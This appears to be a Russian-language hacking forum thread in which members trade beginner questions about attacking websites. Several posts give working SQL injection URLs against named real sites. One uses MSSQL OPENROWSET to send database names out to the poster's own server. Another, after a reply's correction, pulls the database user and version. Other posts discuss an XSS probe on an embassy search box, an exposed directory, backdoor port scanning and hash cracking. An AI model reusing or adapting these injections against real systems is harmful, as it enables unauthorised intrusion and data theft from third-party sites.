вот интересно, нашел сайт, есть таблица админы, ну и там одмины естт и пароли, но на сайте нет ни форума ни админки (сканил) на фтп не подходят, вопрос Зачем они нафиг нужны?
может осталась от чего-то. или просто бд тестили. или фейк. или для другого домена. есть много вариантов
mssql-inject: приём данных на мой сервер Пробую сделать передачу данных через инжект на свой mssql-сервер. Но возникла проблема с моим принимающим сервером. Купил windows-хостинг с выделенным ипом. Создал базу данных MSSQL 2005 с именем basename. Пользователь username с паролем password. Создал таблицу tbltest с колонкой pubs. Посылаю запрос: http://www.top25cigar.com/reviewdatabase/product.asp?pkID=8797&showprod=yes&catpkID=315;insert+into+openrowset('sqloledb','uid=username;pwd=password;network=DBMSSOCN;Address=208.115.103.4','select+line+from+pubs..tbltest')+select+name+from+master..sysdatabases;-- В ответ получаю Cannot open user default database. Login failed. Хотя по умолчанию база данных установлена. Мне кажется, что ошибка где-то в правах доступа. Что мне исправить? Ниже приложу несколько скриншотов из MSSQL Server Management Studio Express.
cyberia 1 акк корректен 2 твоя таблица создана и идентична по структуре 3 запрос без грамматических ошибок 4 есть права на чтение master..sysdatabases Эти условия выполнены? Помоеиу невыполнение ЛЮБОГО из условий не даст тебе ничего сделать. Да , забыл, порт на котором твой сервер висит. Имхо слишком много заморочек, но дело твоё конечно, проверь ВСЕ условия
Подскажите, что можно зделать есть маленький доступ http://fialki.ho.com.ua/products_pictures/ вот от создателей http://www.shop-script.ru/images/ или это не чего не дает
Здравствуйте, разесните мне пожалуйста один момент, при сканировании портов утилитой Shadow Security Scanner 7, она показывает что на сервере открыто огромное количество портов, среди них очень много бекдоров, нахожу клиен к бекдору, но не один не коннектится, пробовал на разных сайтах, где открыты эти порты, ни чего не получилось. XSpyder'ом пробывал сканить, тот вообще не работает, ни трафу не жрет, ни порты не сканирует, только нагрузку на проц создает. Помогите пожалуйста дельным советом.
Spaise В чём вопрос то? XSpyder не работает? Или открытые порты смущают?Огромное кол-во это сколько, и главное какие?С чего ты взял ,что "среди них очень много бекдоров", что за клиент к бекдору?
Code: http://www.wfsj.org/projects/page.php?id=-62+union+select+null,null,null,null,null,null,null,null,null,null,null/* такя проблема есть скуль возникла такая проблема с выводом заначений когда вставляю подставляю int значения Code: http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11/* все норм но если подставляю Что нить типа user или from table возникает ошибка в чем проблема
Пробуй так Code: http://www.wfsj.org/projects/page.php?id=-62+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(USER(),0x71),0x71),4,5,6,7,8,9,10,11/* вер. 4.1.7-nt-max юзер. wfsj@localhost Прочитать можно тут http://forum.antichat.ru/showthread.php?t=19605 Да и еще, убери пробелы которые добавил форум. Удачи.
вобщем тема такая- защел я на наше посольство зарубежом(по понятным причинам умолчу в которое) и в поиске ввел "><script>alert()</script> на что мне выдало вот и возникает у меня вопросс- действительно это скуль? и насколько это опасно в плане IT безопасности (за Родину обидно млин) , мож предупредить их ?
я таки думаю что кроме раскрытия путей больше не как и не используешь по крайней мере по скрину ну это раскрытие может быть полезно если будет скуль с filepriv
zapadlo17 Помоему ошибка при проверке ввода, просто некоректные данные Всмысле, возможность инжекта из этого не вытекает
Ошибка говорит о том, что на MSSQL сервере (скорее всего) отключена поодержка full text search, не знаю почему возникает такая ошибка, но скорее всего из-за того, что в запросе встречаются спецсимволы, которые в полнотекстовом поиске используются в качестве шаблонов
Я не наю, куда ещё писать, но раз это вопросы,то вот пара нупских вопросов : 1. Надо ли указывать настоящий логин для перебора хеша?)) 2. Если да, то как в таком случае используется логин(или имя,как хотите : ) ) для перебора ?)
